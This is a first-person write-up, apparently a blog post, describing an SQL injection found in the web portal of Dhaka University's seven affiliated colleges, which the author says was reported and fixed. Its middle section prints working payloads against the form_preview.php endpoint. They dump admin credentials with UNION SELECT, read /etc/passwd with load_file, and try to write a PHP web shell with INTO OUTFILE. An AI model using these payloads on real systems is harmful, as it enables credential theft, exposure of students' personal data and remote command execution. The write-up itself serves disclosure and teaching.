How I hacked Dhaka University affiliated 7C.

Assalamu alaykum,
I am Mahim Safa, a student of Dhaka College. There are 7 colleges part of Dhaka University. Those are:

These are the 7 colleges under Dhaka University. There are about 243,000+ students are studying here currently. All of their official operations are operated by an online web portal. One of the main operations is “Yearly Form Fill Up”. During this period a huge amount of money transaction is done here. So only in this form fill up period an attacker can do huge damage of approx 729,000,000 TAKA, in dollar which is about 8,604,693 USD. Also, there was a reflected XSS vulnerability but that can not be marked as critical. Now let’s see how I exploited the service.

So according to our college notice, I was given a link to the web portal for form fill up. I logged into the portal with my id given by my college. While submitting the form the URL caught my eye. So I was a little bit curious about the endpoint. So I started trying playing with the URL. At a point, I found SQLi in that particular endpoint.

https://(web-portal-domain.com)/students/form_preview.php?s_year_code=1&session_id=20&exam_id=17

https://(web-portal-domain.com)/students/form_preview.php?s_year_code=1&session_id=20&exam_id=-17' union select 1,2,3,group_concat(username,0x3a,password),5,6 from admin — -

So I tried playing around with SQLi. Then I was able to extract data from the database. I found the Server Admin panel credentials, college admin panel creds, and login credentials for all 243000+ students and their personal info like Full Name, Contact Number, Address, Fathers Name, Mothers Name, and many more. From the college admin panel, I was able to bypass any students transaction. On the other hand from the server admin panel, I was able to add, modify, remove any student. Let’s move on..

After accessing the database I was curious about if I could get access to the server. So I tried some SQL functions if it could get me access RCE to the server. First I tried to read arbitrary files using the load_file() function.

https://(web-portal-domain.com)/students/form_preview.php?s_year_code=1&session_id=20&exam_id=-17' union select 1,2,3,load_file(‘/etc/passwd’),5,6 — -

The SQL query executed successfully. It allowed me to read all the files which were permitted by the webserver. Through this Arbitrary File Read, I was able to read all the source code of the website. Then I was trying to find out a way of writing files to the server to get RCE. So I tried INTO OUTFILE method to writing files.

https://(web-portal-domain.com)/students/form_preview.php?s_year_code=1&session_id=20&exam_id=-17' union select 1,2,3,“<?php system($_GET[‘cmd’]); ?>”,5,6 INTO OUTFILE ‘/var/www/html/images/shell.php’ — -

But unfortunately, it was not permitted to write on that webserver directory. That’s why I was unable to get an RCE on the server.

But in the end, it was a huge vulnerability and could drive into a huge data loss. After reporting about the threat they resolved it. As there were no bug bounty programs running I got nothing as a reward. I recommend everyone to run a bug bounty program to encourage hackers to report you about the vulnerability and not to deal any damage to your site.

That's all for now. See you soon. Stay safe….